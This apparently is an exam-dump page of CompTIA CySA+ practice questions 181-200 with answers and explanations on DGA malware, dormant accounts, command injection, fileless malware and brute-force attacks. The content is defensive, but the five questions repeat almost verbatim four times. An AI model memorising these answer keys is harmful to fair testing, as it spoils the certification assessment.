CompTIA  CS0-003  CySA+  Exam Dumps and Practice Test Questions Set 10 Q181-200

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 181

A SOC analyst observes multiple endpoints in a subnet sending unusually high volumes of outbound DNS queries to external domains that appear randomized and high-entropy. Network logs also indicate outbound traffic over uncommon ports. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Misconfigured internal DNS server
C) Legitimate software updates
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

This scenario indicates a classic example of malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. The combination of high-volume DNS queries to randomized, high-entropy domains and outbound traffic over uncommon ports is a hallmark of DGA activity. Attackers use DGAs to dynamically generate domain names that malware can contact to receive instructions or exfiltrate data, even if some domains are blocked.

DGAs enhance persistence and stealth. Traditional security tools relying on blacklists or signature-based detection struggle to keep pace with dynamically generated domains. These malware variants are frequently employed by advanced persistent threat (APT) actors, ransomware campaigns, and sophisticated botnets to maintain resilient communication channels with compromised hosts.

Detection requires correlating multiple layers of telemetry, including DNS query logs, network traffic patterns, and endpoint behavior. SIEM systems and EDR solutions are crucial for identifying anomalous patterns such as high-entropy DNS queries, abnormal query frequency, or outbound connections over unusual ports. Machine learning models can flag unusual patterns and entropy in DNS queries, helping distinguish malicious activity from normal traffic.

Mitigation involves immediate containment of affected endpoints, blocking identified domains and associated IP addresses, eradicating malware, and performing a thorough forensic investigation. Reverse-engineering the malware or analyzing its DGA logic can help predict future domain names, enabling proactive blocking before communication occurs. Network segmentation, strict egress filtering, and integration of threat intelligence feeds further enhance defenses.

B Misconfigured internal DNS server

While a misconfigured DNS server might generate abnormal traffic, it is unlikely to produce high-frequency queries to randomized, high-entropy domains combined with outbound traffic over uncommon ports.

C Legitimate software updates

Software updates generally communicate with known servers over standard ports. Randomized high-entropy domains and unusual traffic patterns are inconsistent with legitimate updates.

D Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm network resources or services to degrade availability rather than maintaining covert C2 communications.

Question 182

During an internal security review, an analyst discovers several privileged service accounts that have not been used in over nine months but retain administrative privileges. Which of the following controls MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable external SSH connections entirely
D) Deploy full disk encryption across all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose a significant security risk, providing potential attackers with an avenue to gain unauthorized access, maintain persistence, or escalate privileges. Automated account deprovisioning is the most effective control to address this risk because it ensures that accounts are disabled or removed after a defined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.

Integrating automated deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement and auditing. Regulatory compliance standards such as PCI DSS, HIPAA, and SOX often mandate strict control over privileged accounts and regular review of access privileges. Manual processes for deprovisioning are prone to human error and delays, potentially leaving dormant accounts exposed. Automation reduces these risks and ensures timely remediation.

Complementary security controls include implementing multi-factor authentication (MFA), enforcing role-based access control (RBAC), and conducting periodic privilege recertification. Continuous monitoring of account activity helps detect unauthorized attempts to access deprovisioned accounts. By combining these measures, organizations can significantly reduce the likelihood of compromised dormant accounts being used in attacks.

B Increase password complexity for service accounts

While strong passwords mitigate brute-force attacks, they do not address the core risk posed by dormant administrative accounts that remain active and accessible.

C Disable external SSH connections entirely

 Restricting external SSH access reduces potential attack vectors from outside the network but does not address dormant accounts within the environment that can be exploited internally.

D Deploy full disk encryption across all endpoints

Full disk encryption protects data at rest but does not mitigate the risk associated with inactive privileged accounts, which could still be leveraged by attackers for unauthorized access or lateral movement.

Question 183

A penetration tester exploits a vulnerability in a web application that allows unsanitized user input to be executed at the operating system level. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when web applications fail to properly validate user input, allowing attackers to execute arbitrary commands on the underlying operating system. Implementing server-side input validation ensures that user input conforms to expected types, formats, and lengths. Parameterized commands or prepared statements separate user input from executable code, preventing it from being interpreted as commands.

Secure coding practices, including input validation, output encoding, and adherence to established frameworks, reduce the likelihood of introducing command injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) can help identify these vulnerabilities during development or prior to deployment.

Web application firewalls (WAFs) can provide an additional layer of protection by filtering requests that match known malicious patterns. Monitoring anomalous input attempts and logging these activities allow early detection of potential attacks. Remediation involves code updates, secure coding training for developers, and periodic penetration testing to verify that controls remain effective.

TLS encryption secures communication between clients and servers but does not prevent command injection. Increasing session timeout values reduces risk from session hijacking but does not address input validation vulnerabilities. Firewalls at the network layer cannot inspect application-layer input effectively, so they cannot prevent this type of vulnerability. Server-side input validation with parameterized commands is the most effective and direct mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent injection attacks at the application layer.

C Increase session timeout values

Longer or shorter session timeouts can protect against session hijacking but are ineffective against command injection vulnerabilities.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot inspect application-layer input and therefore cannot prevent command injection attacks.

Question 184

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IP addresses. No files are detected on disk, and antivirus scans are clean. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros in Office applications to execute malicious actions. The presence of obfuscated scripts communicating with unknown external IPs without leaving files on disk is indicative of living-off-the-land malware. These threats are specifically designed to bypass traditional signature-based antivirus detection, which relies on identifying known malicious files.

Detection requires advanced monitoring and endpoint telemetry. Endpoint detection and response (EDR) solutions, behavioral analytics, and memory analysis are critical for identifying unusual script execution, anomalous network communications, and deviations from baseline behavior. Indicators of compromise (IOCs) include unexpected PowerShell processes, high-volume outbound traffic to unknown IPs, and abnormal system resource usage.

Mitigation involves immediate containment of affected endpoints, termination of malicious processes, forensic analysis of script behavior, and remediation through malware removal and patching of exploited vulnerabilities. Preventive strategies include enforcing least privilege, implementing application whitelisting, enabling PowerShell script block logging, enforcing execution policies, and integrating threat intelligence feeds to identify and block malicious domains.

A defense-in-depth approach, combining network segmentation, monitoring, user awareness, and incident response processes, is essential for effectively mitigating fileless malware. Unlike traditional ransomware, phishing attacks, or DDoS, fileless malware does not leave persistent files on disk, making it more difficult to detect and necessitating advanced security controls and proactive monitoring.

B Standard ransomware encrypting files

Ransomware operates by encrypting data on disk. In this case, no files were detected being encrypted, making ransomware unlikely.

C Phishing emails delivering malicious attachments

Phishing requires user interaction and delivery of malicious payloads. Memory-resident scripts running in PowerShell without file artifacts do not align with typical phishing behavior.

D Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources, not perform stealthy, memory-resident malicious activity using system tools.

Question 185

A SOC analyst detects multiple failed login attempts from several external IP addresses targeting privileged accounts. The attempts are high-frequency and follow predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware attempting to encrypt files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically try multiple combinations of usernames and passwords to gain unauthorized access to privileged accounts. The high frequency, use of predictable username patterns, and external IP origins strongly indicate automation through scripts, bots, or distributed botnets rather than random human error.

Brute-force attacks are commonly used to compromise weak or reused passwords. Once an attacker gains access to privileged accounts, they can escalate privileges, move laterally across networks, deploy malware, exfiltrate data, or maintain persistence. Distributed brute-force attacks may originate from multiple IPs to evade IP-based blocking or rate-limiting controls.

Detection requires analyzing authentication logs for patterns of failed login attempts, geolocation anomalies, and unusual access times. Security tools such as SIEM and EDR can correlate these events across systems to identify potential brute-force campaigns.

Mitigation strategies include implementing account lockout policies after a defined number of failed attempts, enforcing strong password policies, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence to block malicious IP addresses. Regular monitoring and alerting help respond promptly to ongoing attacks.

B Fileless malware executing in memory

Fileless malware does not typically generate repeated failed login attempts targeting multiple privileged accounts.

C Ransomware attempting to encrypt files

Ransomware focuses on encrypting data on disk and would not manifest as repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering and user interaction, not automated login attempts across multiple accounts.

Question 186

A SOC analyst observes unusual outbound traffic from multiple endpoints to an external IP address over non-standard ports. DNS logs indicate frequent queries to domains with high entropy. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Legitimate software updates
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed pattern strongly suggests malware utilizing a domain generation algorithm (DGA) to maintain communication with command-and-control (C2) servers. High-entropy DNS queries indicate that the malware dynamically generates domain names to contact its C2 infrastructure. This approach allows attackers to evade traditional blacklisting or signature-based defenses because the domain names change frequently.

DGAs are often used by advanced persistent threat (APT) actors, ransomware, and sophisticated botnets to maintain resilient and covert communication channels. Outbound traffic over non-standard ports further supports the likelihood of C2 communication rather than legitimate network operations. Detection relies on correlating DNS query patterns with network traffic, identifying high-entropy domains, and analyzing endpoint behavior.

Machine learning can aid in detecting anomalies in DNS query patterns and outbound traffic, allowing analysts to identify potential DGA activity. Mitigation includes isolating affected hosts, blocking known malicious domains, reverse-engineering the malware to predict future domains, and performing comprehensive forensic investigations. Threat intelligence feeds can provide actionable indicators of compromise (IOCs) to enhance proactive defenses.

B Legitimate software updates

Software updates generally communicate with known servers over standard ports. Randomized high-entropy domain queries are inconsistent with legitimate update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to disrupt availability by overwhelming services, not maintain covert C2 communication channels.

D Misconfigured network monitoring system

Misconfigurations might produce unusual traffic but rarely generate high-entropy domain queries combined with non-standard outbound connections.

Question 187

An analyst identifies multiple privileged accounts that have not been used for over a year. The accounts retain administrative privileges, and the organization lacks a structured review process. Which of the following controls MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts represent a critical security risk because attackers can exploit them to gain unauthorized access, persist in the environment, and move laterally. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, aligning with the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems enforces consistent policy application, auditability, and compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is error-prone, potentially leaving dormant accounts vulnerable. Automation ensures timely removal, reducing operational and security risk.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Automated deprovisioning reduces human error, improves accountability, and strengthens organizational security posture. Logging access attempts to deprovisioned accounts also helps detect insider threats or attempted compromise.

B Increase password complexity for service accounts

Strong passwords reduce the risk of brute-force attacks but do not address the inherent risk posed by inactive administrative accounts.

C Disable all external SSH acces

 Restricting SSH reduces external attack exposure but does not mitigate risks associated with dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

Encryption protects data at rest but does not eliminate risks posed by unused high-privilege accounts.

Question 188

During a penetration test, testers exploit a web application vulnerability that allows arbitrary command execution via user input. Which control BEST mitigates this risk?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized command

Command injection vulnerabilities occur when user input is improperly handled, allowing attackers to execute arbitrary OS commands. Server-side input validation ensures that input adheres to expected types, formats, and lengths, preventing unexpected execution. Parameterized commands or prepared statements separate user input from executable code, eliminating opportunities for injection.

Secure coding practices, including input validation, output encoding, and adherence to secure development frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development or before deployment. Web application firewalls (WAFs) provide an additional layer, filtering requests with malicious patterns.

Monitoring input anomalies and logging suspicious requests allow early detection and response. Remediation includes updating application code, developer training on secure coding, and periodic penetration testing. TLS ensures data privacy but does not mitigate injection attacks. Network firewalls cannot inspect application-layer input effectively, making server-side validation with parameterized commands the most effective control.

B Enforce TLS encryption for web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection.

C Increase session timeout values

Longer or shorter session timeouts reduce session hijacking risks but are ineffective against input validation vulnerabilities.

D Add additional firewall rules at the network perimeter

Network firewalls cannot prevent command injection because they operate primarily at layers 3–4 and cannot inspect application-layer input effectively.

Question 189

A SOC analyst observes obfuscated PowerShell scripts running on multiple endpoints communicating with unknown external IP addresses. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes in memory and uses legitimate system tools like PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk indicate fileless malware or living-off-the-land techniques. Traditional signature-based antivirus solutions often fail to detect this threat due to its memory-resident nature.

Detection relies on behavioral monitoring, endpoint detection and response (EDR) solutions, and memory analysis. Indicators include abnormal PowerShell execution, unusual network connections, and deviations from established baselines. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for TTPs (tactics, techniques, and procedures), and remediating systems.

Preventive strategies include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, and execution policy enforcement. Threat intelligence integration enables blocking malicious domains or IPs. A defense-in-depth approach, combining monitoring, anomaly detection, user awareness, and incident response planning, is essential for effectively mitigating fileless malware.

Unlike ransomware, phishing, or DDoS attacks, fileless malware does not persist on disk and leverages legitimate tools, making advanced monitoring and proactive defense essential.

B Ransomware encrypting files

Ransomware would leave detectable files being encrypted, which is not the case here.

C Phishing campaigns with malicious attachments

Phishing requires user interaction and delivery of payloads, inconsistent with memory-resident scripts running without disk artifacts.

D Distributed denial-of-service (DDoS) attack

DDoS targets resource availability and does not explain obfuscated scripts communicating externally without file artifacts.

Question 190

A SOC analyst detects multiple failed login attempts targeting administrative accounts from external IP addresses. The attempts are frequent and follow predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically attempt numerous username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP origins indicate automation via scripts, bots, or distributed botnets rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, exfiltrate sensitive data, or maintain persistence. Distributed attacks leverage multiple IPs to evade detection and rate-limiting.

Detection involves analyzing authentication logs for failed attempts, geolocation anomalies, and unusual access times. Security information and event management (SIEM) and endpoint detection and response (EDR) systems can correlate events across accounts and systems.

Mitigation strategies include account lockout policies, strong password enforcement, multi-factor authentication (MFA), rate-limiting login attempts, and threat intelligence integration to block known malicious IP addresses. Continuous monitoring and alerting allow rapid response to ongoing attacks.

B Fileless malware executing in memory

 Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting files and would not generate repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering, not automated login attempts across multiple accounts.

Question 191

A SOC analyst observes unusual outbound connections from endpoints to multiple external IP addresses over high-numbered, non-standard ports. DNS logs indicate frequent queries to domains with randomized characters. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed combination of high-volume outbound traffic to multiple external IPs, non-standard port usage, and high-entropy DNS queries strongly suggests malware leveraging a domain generation algorithm (DGA) for command-and-control (C2) communication. DGAs are designed to generate pseudo-random domain names at predefined intervals, allowing malware to maintain resilient and covert channels with its C2 infrastructure even if some domains are blocked or taken down.

This technique is commonly used by advanced persistent threats (APTs), ransomware campaigns, and botnets. Attackers can evade signature-based security solutions and static blacklists because the domain names continuously change. DGAs also complicate forensic investigation, as the dynamic domains make it difficult to trace the attacker’s infrastructure or preemptively block communication channels.

Detection strategies include correlating network traffic with DNS logs, analyzing patterns for high entropy, monitoring endpoint behaviors, and leveraging machine learning models to identify abnormal query patterns. A combination of endpoint detection and response (EDR), intrusion detection systems (IDS), and threat intelligence feeds can provide early warning indicators.

Mitigation involves immediate containment of affected hosts, blocking malicious domains and IP addresses, removing malware, and conducting a thorough forensic investigation. Reverse-engineering the DGA can allow defenders to predict future domains for proactive blocking. Network segmentation, egress filtering, and behavioral analytics provide additional layers of defense, helping prevent lateral movement or data exfiltration.

B Routine software update traffic

Legitimate software updates typically communicate with known servers over standard ports and do not generate randomized domain queries.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming resources to degrade availability, not maintaining covert C2 communication channels.

D Misconfigured network monitoring system

While misconfigurations can generate unusual traffic, they rarely produce high-frequency, high-entropy DNS queries alongside non-standard outbound connections.

Question 192

An analyst identifies multiple privileged accounts that have not been used in over a year. These accounts retain administrative privileges, and no review process is in place. Which control MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts pose significant security risks because attackers can exploit them to gain unauthorized access, maintain persistence, and escalate privileges. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.

Integrating deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is error-prone and may leave dormant accounts vulnerable. Automation ensures timely removal, reducing operational risk and enhancing overall security posture.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts helps detect potential insider threats or attempted compromise.

B Increase password complexity for service accounts

While strong passwords mitigate brute-force attacks, they do not eliminate the risk posed by inactive administrative accounts.

C Disable all external SSH access

Restricting SSH access reduces external exposure but does not mitigate risks from dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

Encryption protects data at rest but does not reduce the risk associated with unused high-privilege accounts.

Question 193

During a penetration test, testers exploit unsanitized input fields in a web application that allow arbitrary command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when web applications fail to properly handle user input, allowing attackers to execute arbitrary OS-level commands. Server-side input validation ensures all user input conforms to expected types, lengths, and formats, while parameterized commands or prepared statements prevent user input from being interpreted as executable code.

Secure coding practices, such as input validation, output encoding, and adherence to secure development frameworks, reduce the likelihood of introducing command injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development or before deployment. Web application firewalls (WAFs) add another layer of protection by filtering known malicious patterns.

Monitoring and logging anomalous input attempts provide early detection, while remediation includes updating application code, training developers in secure coding practices, and performing periodic penetration testing to verify control effectiveness. TLS secures data in transit but does not prevent command injection. Network firewalls cannot inspect application-layer input, making server-side validation with parameterized commands the most effective mitigation.

B Enforce TLS encryption for web traffic

TLS provides confidentiality and integrity of communications but does not mitigate input validation vulnerabilities.

C Increase session timeout values

Session timeout management protects against session hijacking but does not address command injection risks.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot effectively inspect application-layer inputs and therefore cannot prevent command injection attacks.

Question 194

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate tools like PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk are indicative of living-off-the-land malware. Traditional signature-based antivirus solutions often fail to detect these threats due to their memory-resident nature.

Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, high-volume or anomalous network communications, and deviations from baseline behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for tactics, techniques, and procedures (TTPs), and remediating systems.

Preventive strategies include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration of threat intelligence feeds. Defense-in-depth combining network segmentation, monitoring, anomaly detection, user awareness, and incident response planning is critical for effectively mitigating fileless malware.

B Standard ransomware encrypting files

Ransomware leaves file artifacts, which are absent in this scenario, making ransomware unlikely.

C Phishing campaigns with malicious attachments

 Phishing requires user interaction and delivery of payloads, inconsistent with memory-resident obfuscated scripts.

D Distributed denial-of-service (DDoS) attack

DDoS targets resource availability, not stealthy, memory-resident malicious activity.

Question 195

A SOC analyst detects multiple failed login attempts from external IP addresses targeting privileged accounts. Attempts occur frequently and use predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

The scenario describes a brute-force attack, where attackers systematically attempt multiple username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP origins indicate automated tools or scripts rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, or exfiltrate data. Distributed attacks originating from multiple IPs evade detection or rate-limiting measures.

Detection involves analyzing authentication logs for failed attempts, geolocation anomalies, and unusual access times. SIEM and endpoint detection and response (EDR) solutions can correlate events across accounts and systems.

Mitigation includes implementing account lockout policies, enforcing strong passwords, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence to block malicious IPs. Continuous monitoring and alerting enable rapid response to active attacks.

B Fileless malware executing in memory

Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting data, not generating repeated login failures.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering, not automated login attempts across multiple accounts.

Question 196

A SOC analyst notices that multiple endpoints are making frequent DNS requests to domains with high entropy and contacting external IP addresses over uncommon ports. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured network monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed network behavior strongly suggests that malware leveraging a domain generation algorithm (DGA) is maintaining command-and-control (C2) communications with external servers. High-entropy DNS queries indicate that domains are being generated pseudo-randomly, allowing malware to evade static blacklists and signature-based detection.

DGAs are a common tactic used by advanced persistent threats (APTs), ransomware operators, and botnets to maintain resilient and covert communication channels. These dynamically generated domains allow the malware to adapt if some C2 domains are blocked or taken offline. Outbound traffic over uncommon ports further strengthens the evidence of malware attempting to bypass traditional security measures.

Detection requires comprehensive monitoring, including DNS query logs, network traffic analysis, and endpoint behavior tracking. Machine learning can assist in identifying high-entropy domains and anomalous traffic patterns that deviate from baseline behavior. Endpoint detection and response (EDR) tools combined with threat intelligence feeds help identify indicators of compromise (IOCs) and predict potential future domains based on observed DGA logic.

Mitigation strategies include isolating infected endpoints, blocking detected domains and IP addresses, removing malware from systems, and conducting thorough forensic analysis. Reverse engineering the malware’s DGA component allows proactive blocking of predicted domains. Network segmentation, strict egress filtering, and behavior-based monitoring provide additional layers of defense to contain and prevent the spread of malware.

B Routine software update traffic

Legitimate software updates communicate with known servers over standard ports. Randomized high-entropy domains and unusual outbound traffic patterns do not align with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming network resources to degrade availability, rather than establishing covert C2 communications.

D Misconfigured network monitoring system

Misconfigurations can generate anomalous traffic, but rarely produce high-entropy DNS queries and outbound connections over non-standard ports simultaneously.

Question 197

An analyst identifies multiple privileged service accounts that have not been used for over a year. These accounts still retain administrative privileges, and no formal review process is in place. Which control MOST effectively mitigates this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption across endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts present significant security risks as attackers can exploit them to gain unauthorized access, maintain persistence, and escalate privileges. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, enforcing the principle of least privilege and minimizing the attack surface.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditability, and compliance with regulatory requirements such as PCI DSS, HIPAA, and SOX. Manual account deprovisioning is error-prone and may leave accounts active longer than necessary, increasing exposure to attacks. Automation reduces human error and ensures timely enforcement.

Complementary controls include implementing multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts provides visibility into potential insider threats or attempted compromises. Automated deprovisioning strengthens organizational security posture, reduces risk, and ensures compliance with established security policies.

B Increase password complexity for service accounts
 

While complex passwords reduce the risk of brute-force attacks, they do not address risks posed by inactive accounts that retain privileges.

C Disable all external SSH access

Restricting SSH access mitigates some external attack vectors but does not address risks associated with dormant internal privileged accounts.

D Deploy full disk encryption across endpoints

 Encryption protects data at rest but does not mitigate the risk associated with inactive high-privilege accounts.

Question 198

During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution via unsanitized input fields. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the network perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities arise when web applications improperly handle user input, allowing attackers to execute arbitrary OS commands. Server-side input validation ensures that all inputs conform to expected patterns, types, and lengths, preventing unexpected command execution. Parameterized commands or prepared statements separate user input from executable code, mitigating injection risks.

Secure coding practices, including input validation, output encoding, and adherence to development frameworks, reduce the likelihood of such vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development or pre-deployment. Web application firewalls (WAFs) can provide additional protection by blocking known malicious payloads and input patterns.

Continuous monitoring and logging of anomalous input attempts allow early detection of attack attempts. Remediation involves updating application code, training developers in secure coding, and conducting periodic penetration tests to verify the effectiveness of implemented controls. TLS encryption ensures confidentiality of data in transit but does not prevent command injection. Network firewalls cannot inspect application-layer inputs, making server-side validation with parameterized commands the most effective mitigation control.

B Enforce TLS encryption for web traffic

TLS secures communications but does not prevent malicious input from being executed on the server.

C Increase session timeout values

Session timeout policies help protect against session hijacking but do not mitigate command injection vulnerabilities.

D Add additional firewall rules at the network perimeter

Network-layer firewalls cannot inspect application-layer input effectively, making them insufficient to prevent command injection attacks.

Question 199

A SOC analyst observes obfuscated PowerShell scripts executing in memory on multiple endpoints, communicating with external IP addresses. Antivirus scans detect no files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing campaigns with malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, Windows Management Instrumentation (WMI), or Office macros to execute malicious actions. Obfuscated scripts communicating with unknown external IPs without leaving files on disk are indicative of living-off-the-land malware. Signature-based antivirus solutions often fail to detect these threats because they reside entirely in memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators of compromise include abnormal script execution, high-volume or anomalous outbound communications, and deviations from baseline system behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for tactics, techniques, and procedures (TTPs), and remediating the infected systems.

Preventive measures include enforcing least privilege, implementing application whitelisting, enabling PowerShell script block logging, enforcing execution policies, and integrating threat intelligence feeds to block malicious domains. A defense-in-depth approach, combining monitoring, anomaly detection, network segmentation, and incident response planning, is essential to mitigate fileless malware effectively.

Unlike ransomware, phishing, or DDoS, fileless malware avoids writing files to disk, making it stealthy and challenging to detect, necessitating advanced security controls and proactive monitoring.

B Standard ransomware encrypting files

Ransomware leaves artifacts on disk, which are not observed in this case.

C Phishing campaigns with malicious attachments

Phishing requires user interaction to deliver payloads, which is inconsistent with in-memory script execution.

D Distributed denial-of-service (DDoS) attack

DDoS targets service availability and does not involve stealthy in-memory script execution or outbound communications.

Question 200

A SOC analyst detects multiple failed login attempts from external IP addresses targeting administrative accounts. Attempts occur frequently and use predictable username patterns. Which of the following is the MOST likely threat?

A) Brute-force attack targeting credentials
B) Fileless malware executing in memory
C) Ransomware encrypting files
D) Spear-phishing targeting executives

Answer A

Explanation:

A Brute-force attack targeting credentials

This scenario describes a brute-force attack in which attackers systematically attempt multiple username-password combinations to gain unauthorized access. High-frequency attempts, predictable usernames, and external IP sources indicate automated attack tools rather than human error.

Brute-force attacks target weak or reused passwords, and compromised administrative accounts can allow attackers to escalate privileges, move laterally, deploy malware, exfiltrate data, or maintain persistence. Distributed attacks may use multiple IP addresses to evade rate-limiting controls.

Detection involves analyzing authentication logs for failed login attempts, geolocation anomalies, and unusual access patterns. Security information and event management (SIEM) and endpoint detection and response (EDR) systems can correlate events across multiple accounts to identify ongoing brute-force attacks.

